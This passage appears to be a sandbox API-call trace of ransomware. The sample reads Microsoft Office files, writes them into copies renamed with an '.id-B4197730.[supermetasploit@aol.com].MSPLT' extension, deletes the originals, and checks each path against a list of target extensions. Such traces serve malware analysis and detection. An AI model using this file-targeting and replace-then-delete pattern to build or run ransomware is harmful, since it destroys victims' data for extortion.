Office\\Office16\\OSPP.HTM.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0175.404] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.404] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0175.406] GetLastError () returned 0x0 [0175.406] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x2a9c0, lpOverlapped=0x0) returned 1 [0175.798] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x2a9d0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x2a9d0, lpOverlapped=0x0) returned 1 [0175.801] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0175.802] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0175.802] SetEndOfFile (hFile=0x2e8) returned 1 [0175.802] CloseHandle (hObject=0x2e8) returned 1 [0175.806] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.806] SetEndOfFile (hFile=0x350) returned 1 [0175.808] CloseHandle (hObject=0x350) returned 1 [0175.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.893] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 1 [0175.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.893] lstrlenW (lpString=".doc") returned 4 [0175.893] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0175.893] lstrlenW (lpString=".docx") returned 5 [0175.893] lstrcmpiW (lpString1=".docx", lpString2="P.HTM") returned -1 [0175.893] lstrlenW (lpString=".pdf") returned 4 [0175.893] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0175.893] lstrlenW (lpString=".xls") returned 4 [0175.893] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0175.893] lstrlenW (lpString=".xlsx") returned 5 [0175.893] lstrcmpiW (lpString1=".xlsx", lpString2="P.HTM") returned -1 [0175.893] lstrlenW (lpString=".ppt") returned 4 [0175.894] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0175.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.894] lstrlenW (lpString=".zip") returned 4 [0175.894] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0175.894] lstrlenW (lpString=".rar") returned 4 [0175.894] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0175.894] lstrlenW (lpString=".bz2") returned 4 [0175.894] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0175.894] lstrlenW (lpString=".7z") returned 3 [0175.894] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0175.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.894] lstrlenW (lpString=".dbf") returned 4 [0175.894] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0175.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.894] lstrlenW (lpString=".1cd") returned 4 [0175.894] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0175.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.894] lstrlenW (lpString=".jpg") returned 4 [0175.894] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0175.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.894] lstrlenW (lpString=".doc") returned 4 [0175.894] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0175.894] lstrlenW (lpString=".docx") returned 5 [0175.894] lstrcmpiW (lpString1=".docx", lpString2="P.HTM") returned -1 [0175.894] lstrlenW (lpString=".pdf") returned 4 [0175.894] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0175.894] lstrlenW (lpString=".xls") returned 4 [0175.894] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0175.894] lstrlenW (lpString=".xlsx") returned 5 [0175.894] lstrcmpiW (lpString1=".xlsx", lpString2="P.HTM") returned -1 [0175.895] lstrlenW (lpString=".ppt") returned 4 [0175.895] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0175.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.895] lstrlenW (lpString=".zip") returned 4 [0175.895] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0175.895] lstrlenW (lpString=".rar") returned 4 [0175.895] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0175.895] lstrlenW (lpString=".bz2") returned 4 [0175.895] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0175.895] lstrlenW (lpString=".7z") returned 3 [0175.895] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0175.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.895] lstrlenW (lpString=".dbf") returned 4 [0175.895] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0175.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.895] lstrlenW (lpString=".1cd") returned 4 [0175.895] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0175.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0175.895] lstrlenW (lpString=".jpg") returned 4 [0175.895] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0175.895] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0175.895] lstrlenW (lpString="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 53 [0175.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0175.897] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=800867) returned 1 [0175.897] CloseHandle (hObject=0x2e8) returned 1 [0175.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 0x220 [0175.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0175.898] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.898] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0175.899] GetLastError () returned 0x0 [0175.899] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xc3863, lpOverlapped=0x0) returned 1 [0176.000] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xc3870, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xc3870, lpOverlapped=0x0) returned 1 [0176.450] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0176.450] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.450] SetEndOfFile (hFile=0x368) returned 1 [0176.450] CloseHandle (hObject=0x368) returned 1 [0176.803] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0176.804] SetEndOfFile (hFile=0x2e8) returned 1 [0176.815] CloseHandle (hObject=0x2e8) returned 1 [0176.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.090] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 1 [0177.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.090] lstrlenW (lpString=".doc") returned 4 [0177.090] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.090] lstrlenW (lpString=".docx") returned 5 [0177.090] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.090] lstrlenW (lpString=".pdf") returned 4 [0177.090] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.090] lstrlenW (lpString=".xls") returned 4 [0177.090] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.090] lstrlenW (lpString=".xlsx") returned 5 [0177.090] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.090] lstrlenW (lpString=".ppt") returned 4 [0177.090] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.090] lstrlenW (lpString=".zip") returned 4 [0177.090] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.090] lstrlenW (lpString=".rar") returned 4 [0177.090] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.090] lstrlenW (lpString=".bz2") returned 4 [0177.090] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.090] lstrlenW (lpString=".7z") returned 3 [0177.090] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.091] lstrlenW (lpString=".dbf") returned 4 [0177.091] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.091] lstrlenW (lpString=".1cd") returned 4 [0177.091] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.091] lstrlenW (lpString=".jpg") returned 4 [0177.091] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.091] lstrlenW (lpString=".doc") returned 4 [0177.091] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString=".docx") returned 5 [0177.091] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.091] lstrlenW (lpString=".pdf") returned 4 [0177.091] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString=".xls") returned 4 [0177.091] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString=".xlsx") returned 5 [0177.091] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.091] lstrlenW (lpString=".ppt") returned 4 [0177.091] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.092] lstrlenW (lpString=".zip") returned 4 [0177.092] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.092] lstrlenW (lpString=".rar") returned 4 [0177.092] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.092] lstrlenW (lpString=".bz2") returned 4 [0177.092] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.092] lstrlenW (lpString=".7z") returned 3 [0177.092] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.092] lstrlenW (lpString=".dbf") returned 4 [0177.092] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.092] lstrlenW (lpString=".1cd") returned 4 [0177.092] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0177.092] lstrlenW (lpString=".jpg") returned 4 [0177.092] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.092] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.092] lstrlenW (lpString="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 53 [0177.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0177.093] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=1124942) returned 1 [0177.093] CloseHandle (hObject=0x2e8) returned 1 [0177.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 0x220 [0177.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0177.093] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0177.093] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0177.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0177.094] GetLastError () returned 0x0 [0177.094] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xffff0, lpOverlapped=0x0) returned 1 [0177.130] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xffff0, lpOverlapped=0x0) returned 1 [0178.727] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x12a5e, lpOverlapped=0x0) returned 1 [0178.747] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x12a60, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x12a60, lpOverlapped=0x0) returned 1 [0179.956] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0179.957] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e, lpOverlapped=0x0) returned 1 [0179.957] SetEndOfFile (hFile=0x368) returned 1 [0181.565] CloseHandle (hObject=0x368) returned 1 [0182.926] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0182.944] SetEndOfFile (hFile=0x2e8) returned 1 [0182.968] CloseHandle (hObject=0x2e8) returned 1 [0182.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.969] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 1 [0182.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.969] lstrlenW (lpString=".doc") returned 4 [0182.969] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.969] lstrlenW (lpString=".docx") returned 5 [0182.969] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.969] lstrlenW (lpString=".pdf") returned 4 [0182.969] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.969] lstrlenW (lpString=".xls") returned 4 [0182.969] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString=".xlsx") returned 5 [0182.970] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.970] lstrlenW (lpString=".ppt") returned 4 [0182.970] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.970] lstrlenW (lpString=".zip") returned 4 [0182.970] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.970] lstrlenW (lpString=".rar") returned 4 [0182.970] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString=".bz2") returned 4 [0182.970] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString=".7z") returned 3 [0182.970] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.970] lstrlenW (lpString=".dbf") returned 4 [0182.970] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.970] lstrlenW (lpString=".1cd") returned 4 [0182.970] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.970] lstrlenW (lpString=".jpg") returned 4 [0182.970] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.970] lstrlenW (lpString=".doc") returned 4 [0182.970] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString=".docx") returned 5 [0182.971] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.971] lstrlenW (lpString=".pdf") returned 4 [0182.971] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString=".xls") returned 4 [0182.971] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString=".xlsx") returned 5 [0182.971] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.971] lstrlenW (lpString=".ppt") returned 4 [0182.971] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.971] lstrlenW (lpString=".zip") returned 4 [0182.971] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.971] lstrlenW (lpString=".rar") returned 4 [0182.971] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString=".bz2") returned 4 [0182.971] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString=".7z") returned 3 [0182.971] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.971] lstrlenW (lpString=".dbf") returned 4 [0182.971] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.971] lstrlenW (lpString=".1cd") returned 4 [0182.971] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0182.971] lstrlenW (lpString=".jpg") returned 4 [0182.971] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.972] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.972] lstrlenW 